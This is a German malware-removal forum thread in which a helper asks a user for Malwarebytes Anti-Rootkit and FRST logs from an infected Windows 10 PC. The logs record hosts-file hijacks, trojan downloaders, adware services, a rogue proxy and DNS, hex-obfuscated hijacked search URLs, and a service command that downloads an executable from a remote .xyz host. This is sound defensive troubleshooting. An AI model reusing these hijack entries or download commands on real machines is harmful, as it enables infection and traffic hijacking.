C:\Windows\System32\drivers\etc\hosts (Hijack.Host) -> Bad: (107.178.255.88 www.google-analytics.com) Good: () -> Replace on reboot. [8ebb1486a6f422147d06d9c4f60ed52b]
C:\Windows\System32\drivers\etc\hosts (Hijack.Host) -> Bad: (nalytics.com
107.178.255.88 www.s) Good: () -> Replace on reboot. [d6735a40c3d7f640780b27760afa1ae6]
C:\Windows\System32\drivers\etc\hosts (Hijack.Host) -> Bad: (gle-analytics.com
107.178.255) Good: () -> Replace on reboot. [fd4c683254460c2ae69d6b3262a27b85]
C:\Windows\System32\drivers\etc\hosts (Hijack.Host) -> Bad: (.google-analytics.com
107.178.255.88 w) Good: () -> Replace on reboot. [72d7afeb801a89adfd86cbd246bede22]
C:\Windows\System32\drivers\etc\hosts (Hijack.Host) -> Bad: (nalytics.com
107.178.255.88 www.statcounte) Good: () -> Replace on reboot. [4efb42587c1ed462c4bfc7d6937135cb]
C:\Windows\System32\drivers\etc\hosts (Hijack.Host) -> Bad: (tics.com
107.178.255.88 www.statco) Good: () -> Replace on reboot. [85c442589208bb7be99aedb0877d649c]
C:\Windows\System32\drivers\etc\hosts (Hijack.Host) -> Bad: (er.com
107.178.255.88 ssl.google-analy) Good: () -> Replace on reboot. [ac9deeac059594a25231702d40c4fa06]

Physical Sectors Detected: 0
(No malicious items detected)

(end)
Code:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2016.10.17.07
  rootkit: v2016.09.26.02

Windows 10 x64 NTFS
Internet Explorer 11.187.14393.0
maikp :: DESKTOP-CHK5R9U [administrator]

17.10.2016 16:42:26
mbar-log-2016-10-17 (16-42-26).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 321575
Time elapsed: 28 minute(s), 40 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 1
C:\ProgramData\Quoteex\Toughfan.exe (Trojan.Downloader) -> Delete on reboot. [2922b7e358423501c6ef93463fc559a7]

Physical Sectors Detected: 0
(No malicious items detected)

(end)
Code:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2016.10.17.07
  rootkit: v2016.09.26.02

Windows 10 x64 NTFS
Internet Explorer 11.187.14393.0
maikp :: DESKTOP-CHK5R9U [administrator]

17.10.2016 17:23:56
mbar-log-2016-10-17 (17-23-56).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 322028
Time elapsed: 29 minute(s), 59 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 1
C:\ProgramData\Quoteex\S-bam.exe (Trojan.Downloader) -> Delete on reboot. [3a110e8c02987abc298c0ccd40c4b050]

Physical Sectors Detected: 0
(No malicious items detected)

(end)
Code:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2016.10.17.08
  rootkit: v2016.09.26.02

Windows 10 x64 NTFS
Internet Explorer 11.187.14393.0
maikp :: DESKTOP-CHK5R9U [administrator]

17.10.2016 18:26:24
mbar-log-2016-10-17 (18-26-24).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 322070
Time elapsed: 24 minute(s), 7 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 2
C:\Windows\System32\drivers\850f7be33916569bd078ba09b46b7e7d.sys (PUP.Optional.Wajam.Generic) -> Delete on reboot. [aa8fdc1802a9d5d9574255ef9d3ce83c]
C:\Windows\Temp\1120.tmp (Adware.ConvertAd) -> Delete on reboot. [202cc6d403970e28a50c442729d943bd]

Physical Sectors Detected: 0
(No malicious items detected)

(end)
Code:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2016.10.17.08
  rootkit: v2016.09.26.02

Windows 10 x64 NTFS
Internet Explorer 11.187.14393.0
maikp :: DESKTOP-CHK5R9U [administrator]

17.10.2016 19:02:54
mbar-log-2016-10-17 (19-02-54).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 322532
Time elapsed: 30 minute(s), 11 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 1
C:\ProgramData\Quoteex\Dalttrax.exe (Trojan.Downloader) -> Delete on reboot. [ed5f2c6e3f5b999d60529d3c3aca22de]

Physical Sectors Detected: 0
(No malicious items detected)

(end)

cosinus 18.10.2016 08:32
Bitte einen weiteren Scan mit MBAR machen. Oder hat es nix mehr gefunden/entfernt?

RonnyP 18.10.2016 12:37
So, musste den Scan heute noch 2 mal durchlaufen lassen, aber beim letzten hat er dann nichts mehr gefunden.

Hier die Logs.

Code:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2016.10.18.06
  rootkit: v2016.09.26.02

Windows 10 x64 NTFS
Internet Explorer 11.187.14393.0
maikp :: DESKTOP-CHK5R9U [administrator]

18.10.2016 11:45:08
mbar-log-2016-10-18 (11-45-08).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 322739
Time elapsed: 25 minute(s), 8 second(s)

Memory Processes Detected: 1
C:\ProgramData\Quoteex\Quoteex.exe (Adware.Agent) -> 2348 -> Delete on reboot. [b9f50e8c35651a1cb7715db7788de818]

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 2
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QUOTEEX.EXE (Adware.Agent) -> Delete on reboot. [b9f50e8c35651a1cb7715db7788de818]
HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QUOTEEX.EXE (Adware.Agent) -> Delete on reboot. [b9f50e8c35651a1cb7715db7788de818]

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 4
C:\ProgramData\Quoteex\Quoteex.exe (Adware.Agent) -> Delete on reboot. [b9f50e8c35651a1cb7715db7788de818]
C:\ProgramData\Quoteex\Techcore.exe (Trojan.Downloader) -> Delete on reboot. [4f5fa4f6425896a06d44d00959aba65a]
C:\Users\maikp\AppData\Roaming\KeyApphase.exe (Adware.Agent) -> Delete on reboot. [00aefc9e76242610f92fc84c3fc637c9]
C:\Users\maikp\AppData\Local\Temp\274246171\ic-0.24433670a4d664.exe (Adware.Agent) -> Delete on reboot. [921cc7d33664f145d454c351f213ed13]

Physical Sectors Detected: 0
(No malicious items detected)

(end)
Code:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2016.10.18.06
  rootkit: v2016.09.26.02

Windows 10 x64 NTFS
Internet Explorer 11.187.14393.0
maikp :: DESKTOP-CHK5R9U [administrator]

18.10.2016 12:43:21
mbar-log-2016-10-18 (12-43-21).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 322803
Time elapsed: 27 minute(s), 22 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)

cosinus 18.10.2016 12:41
Dann zeig mal frische FRST Logs. Haken setzen bei addition.txt dann auf Untersuchen klicken

http://www.trojaner-board.de/picture...&pictureid=611

RonnyP 18.10.2016 13:40
Hier die frischen Logs.

FRST 1/2
Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 17-10-2016
durchgeführt von maikp (Administrator) auf DESKTOP-CHK5R9U (18-10-2016 14:08:12)
Gestartet von C:\Users\maikp\Downloads
Geladene Profile: maikp (Verfügbare Profile: maikp)
Platform: Windows 10 Home Version 1607 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Edge)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files\Yhid\Veticeq.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
() C:\ProgramData\Logic Handler\set.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
() C:\Program Files (x86)\03AA02FC-1475952944-05C3-7606-B70700080009\knsuD3B.tmpfs
() C:\Program Files (x86)\WebShield\WebShield.exe
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
() C:\Program Files (x86)\InterHop\InterHop.exe
() C:\ProgramData\NetworkPacketManitor\Nettrans.exe
() C:\Users\maikp\AppData\Roaming\Geunfy\Geunfy.exe
() C:\Windows\SysWOW64\NetUtils2016.exe
(Search Module Ltd.) C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe
() C:\Users\maikp\AppData\Local\Apps\2.0\abril.exe
() C:\Program Files (x86)\WinSaber\WinSaber.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
() C:\Program Files\Yhid\Amaak.exe
() C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe
() C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe
() C:\Program Files (x86)\Y2Go\bin\Y2Go.exe
() C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe
() C:\Program Files (x86)\SystemHealer\SystemHealer.exe
(Microsoft Corporation) C:\Windows\System32\WpcMon.exe
() C:\Users\maikp\AppData\Roaming\Geunfy\Yurejjaeb.exe
() C:\Users\maikp\AppData\Roaming\Geunfy\Yjetipudl.exe
() C:\Program Files\Yhid\Ezolbusp.exe
() C:\Program Files\Yhid\Ezolbusp64.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
() C:\Program Files (x86)\Y2Go\bin\pt.exe
() C:\Program Files (x86)\Y2Go\bin\UrlHandler.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
() C:\Program Files (x86)\mpck\wincom_VL5.exe
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATIPME.EXE
() C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe
(JKJHGF6) C:\Program Files\Caster\wizzcaster.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
() C:\Users\maikp\AppData\Roaming\AppTrailers\AppTrailers.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
() C:\Users\maikp\AppData\Roaming\DailyBee\DailyBee.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
() C:\Users\maikp\AppData\Roaming\AppTrailers\AppTrailers.exe
() C:\Users\maikp\AppData\Roaming\AppTrailers\AppTrailers.exe
() C:\Users\maikp\AppData\Roaming\DailyBee\DailyBee.exe
() C:\Users\maikp\AppData\Roaming\DailyBee\DailyBee.exe
() C:\Windows\Temp\E02F.tmp
() C:\Users\maikp\AppData\Local\03AA02FC-1476796004-05C3-7606-B70700080009\qnsvF8F5.tmp
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeHost.exe
() C:\Program Files (x86)\mpck\wincom_VL5.exe
() C:\Program Files (x86)\mpck\wincom_VL5.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe


==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-27] (Microsoft Corporation)
HKLM\...\Run: [SpaceSoundPro] => C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe [4203520 2015-08-03] (Space Sound Pro)
HKLM\...\Run: [WINCOMVL5] => C:\Program Files (x86)\mpck\wincom_VL5.exe [4284416 2016-10-08] ()
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-11-04] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [NUMPADL] => USBNUMP.exe
HKLM-x32\...\Run: [NUMCHK] => NumpChk.exe
HKLM-x32\...\Run: [AppTrailers] => C:\Users\maikp\AppData\Roaming\AppTrailers\AppTrailers.exe [47824832 2016-09-29] ()
HKLM-x32\...\Run: [DiskPower] => C:\Program Files (x86)\DPower\DiskPower.exe [210432 2016-07-21] ()
HKLM-x32\...\Run: [DailyBee] => C:\Users\maikp\AppData\Roaming\DailyBee\DailyBee.exe [47813592 2016-09-29] ()
HKLM-x32\...\Run: [Avira SystrayStartTrigger] => C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe [61648 2016-09-26] (Avira Operations GmbH & Co. KG)
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YATIPME.EXE [417776 2014-11-14] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\...\Run: [WebDiscoverBrowser] => C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe [985312 2016-05-27] ()
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\...\Run: [Caster] => C:\Program Files\Caster\wizzcaster.exe [240640 2016-10-08] (JKJHGF6)
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\...\MountPoints2: {32d903d3-7d5a-11e6-b073-806e6f6e6963} - "F:\InstallNavi.exe"
HKU\S-1-5-18\...\Run: [] => 0
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX64.dll Keine Datei
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX64.dll Keine Datei
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX64.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX32.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX32.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\maikp\AppData\Local\MEGAsync\ShellExtX32.dll Keine Datei
GroupPolicyUsers\S-1-5-21-1190326282-1682839636-2826347982-1002\User: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

ProxyEnable: [S-1-5-21-1190326282-1682839636-2826347982-1002] => Proxy ist aktiviert.
ProxyServer: [S-1-5-21-1190326282-1682839636-2826347982-1002] => http=127.0.0.1:8808;https=127.0.0.1:8808
Hosts: Hosts Datei wurde nicht im Standardordner gefunden
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{c8a8d149-3bfe-4dd1-b1af-42c3580adb39}: [NameServer] 188.120.239.115,8.8.8.8
Tcpip\..\Interfaces\{c8a8d149-3bfe-4dd1-b1af-42c3580adb39}: [DhcpNameServer] 192.168.2.1
ManualProxies:

Internet Explorer:
==================
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYyl1r6DuqvBI4SfIYaaQWq8QvX4cC9apWMdG7qCKJo9OarQZiRNfFLxEWZRikJJxRmvgzFJNPsfTqLAIe&q={searchTerms}
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYxkvGPup7Mg0M56BkMDSsdML4JBRvebV2qsEBaL_y70m-u5OhTvOG2ZcCHwEFZ0dQJWwB6ROxd_6oJGbn
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.hyrican.de
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYyl1r6DuqvBI4SfIYaaQWq8QvX4cC9apWMdG7qCKJo9OarQZiRNfFLxEWZRikJJxRmvgzFJNPsfTqLAIe&q={searchTerms}
HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYyl1r6DuqvBI4SfIYaaQWq8QvX4cC9apWMdG7qCKJo9OarQZiRNfFLxEWZRikJJxRmvgzFJNPsfTqLAIe&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYyl1r6DuqvBI4SfIYaaQWq8QvX4cC9apWMdG7qCKJo9OarQZiRNfFLxEWZRikJJxRmvgzFJNPsfTqLAIe&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002 -> DefaultScope {ielnksrch} URL = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYyl1r6DuqvBI4SfIYaaQWq8QvX4cC9apWMdG7qCKJo9OarQZiRNfFLxEWZRikJJxRmvgzFJNPsfTqLAIe&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002 -> {FAD3AE2D-3E11-4E7C-82B8-904BB0EBAD7B} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=GA9zftptn095001AU,ff9750b9-f837-4047-8c09-0146ff18dda0,
SearchScopes: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002 -> {ielnksrch} URL = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYyl1r6DuqvBI4SfIYaaQWq8QvX4cC9apWMdG7qCKJo9OarQZiRNfFLxEWZRikJJxRmvgzFJNPsfTqLAIe&q={searchTerms}
BHO: FunFeedr -> {FFCDE64D-6974-45D8-8B68-1614D9D89C2B} -> C:\Program Files (x86)\FunFeedr\Content.x64.dll [2016-07-17] (FunFeedr)
BHO-x32: FunFeedr -> {FFCDE64D-6974-45D8-8B68-1614D9D89C2B} -> C:\Program Files (x86)\FunFeedr\Content.dll [2016-07-17] (FunFeedr)

FireFox:
========
FF DefaultProfile: 1nisvqqo.default
FF ProfilePath: C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\1nisvqqo.default\Profiles\1nisvqqo.default [nicht gefunden]
FF ProfilePath: C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default [2016-10-18]
FF user.js: detected! => C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\user.js [2016-10-09]
FF NewTab: Mozilla\Firefox\Profiles\1nisvqqo.default ->
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\1nisvqqo.default -> youndoo
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\1nisvqqo.default -> youndoo
FF Keyword.URL: Mozilla\Firefox\Profiles\1nisvqqo.default -> hxxp://www-searching.com/search.aspx?site=shdefault1&prd=smw&pid=s&shr=d&q={searchTerms}&s=GA9zftptn095001AU,ff9750b9-f837-4047-8c09-0146ff18dda0,
FF Homepage: Mozilla\Firefox\Profiles\1nisvqqo.default ->
FF Extension: (goMovix - Movies And More) - C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\Extensions\caa1-aDOiCAxFFMOVIX@jetpack.xpi [2016-10-03]
FF Extension: (Adblock Plus) - C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-10-03]
FF SearchPlugin: C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\searchplugins\cvlj4y2n.xml [2016-10-09]
FF SearchPlugin: C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\searchplugins\smod.xml [2016-10-09]

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 A664B55A-D881-48A8-bEA5-02B80DDCA170; C:\Program Files\Yhid\Veticeq.exe [271872 2016-10-09] () [Datei ist nicht signiert]
S2 ad11222373fdc03dd874a65a6c6001bc; C:\Program Files\ad11222373fdc03dd874a65a6c6001bc\a080856dd34136605cca635f3f51b1dc.exe [18874368 2016-10-06] () [Datei ist nicht signiert] <==== ACHTUNG
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [351944 2015-11-04] (Advanced Micro Devices, Inc.)
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [350584 2016-09-26] (Avira Operations GmbH & Co. KG)
R2 backlh; C:\ProgramData\Logic Handler\set.exe [3786752 2016-10-07] () [Datei ist nicht signiert]
S2 bf7821d4713d4971d25a53d8d6cb8f99; C:\Program Files\bf7821d4713d4971d25a53d8d6cb8f99\a080856dd34136605cca635f3f51b1dc.exe [9508864 2016-10-17] () [Datei ist nicht signiert] <==== ACHTUNG
R2 DqWPLkdO; C:\Program Files (x86)\WebShield\WebShield.exe [360448 2016-10-14] () [Datei ist nicht signiert]
R2 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [144560 2012-05-17] (Seiko Epson Corporation)
R2 InterHop; C:\Program Files (x86)\InterHop\InterHop.exe [159232 2016-10-09] () [Datei ist nicht signiert]
R2 Nettrans; C:\ProgramData\NetworkPacketManitor\Nettrans.exe [57856 2016-09-28] () [Datei ist nicht signiert]
R2 NetUtils2016srv; C:\WINDOWS\SysWOW64\NetUtils2016.exe [470592 2016-10-08] ()
R2 Noije; C:\Users\maikp\AppData\Roaming\Geunfy\Geunfy.exe [170496 2016-08-11] () [Datei ist nicht signiert]
R2 ProntSpooler; C:\Users\maikp\AppData\Local\Apps\2.0\abril.exe [134656 2016-05-19] () [Datei ist nicht signiert] <==== ACHTUNG
R2 SMUpd; C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe [3109888 2016-10-09] (Search Module Ltd.) [Datei ist nicht signiert]
R2 Uwiseferesy; C:\Program Files (x86)\Ferqesp\cletaspwseMnt.dll [277504 2016-10-08] () [Datei ist nicht signiert]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
S2 wdsvc; C:\Program Files\WebDiscoverBrowser\wdsvc2.exe [305376 2016-05-27] (Startup Service)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
R2 winsaber; C:\Program Files (x86)\WinSaber\WinSaber.exe [693976 2016-10-14] ()
R2 Yhid Updater; C:\Program Files\Yhid\Amaak.exe [255488 2016-10-09] () [Datei ist nicht signiert]
R2 zigipyro; C:\Users\maikp\AppData\Local\03AA02FC-1476796004-05C3-7606-B70700080009\qnsvF8F5.tmp [158720 2015-12-26] () [Datei ist nicht signiert]
S2 Bokvunnu; "C:\Users\maikp\AppData\Roaming\GowvePitpagf\Lurzem.exe" -cms [X]
R2 bugowutu; C:\Program Files (x86)\03AA02FC-1475952944-05C3-7606-B70700080009\knsuD3B.tmpfs [X]
S3 CHNGTSvc; c:\exervice.exe hxxp://cloudfront.f9dfc741d813c355ca38c2f3caf8380d42d27a38.xyz/download/xpack1018_DE.1476784947.exe [X] <==== ACHTUNG
S2 Quoteex; C:\ProgramData\\Quoteex\\Quoteex.exe shuz -f "C:\ProgramData\\Quoteex\\Quoteex.dat" -l -a

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R0 amdide64; C:\WINDOWS\System32\drivers\amdide64.sys [11944 2013-03-08] (Advanced Micro Devices Inc.)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [21160 2012-09-23] (Advanced Micro Devices, Inc.)
R2 AODDriver4.3; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [59616 2014-02-11] (Advanced Micro Devices)
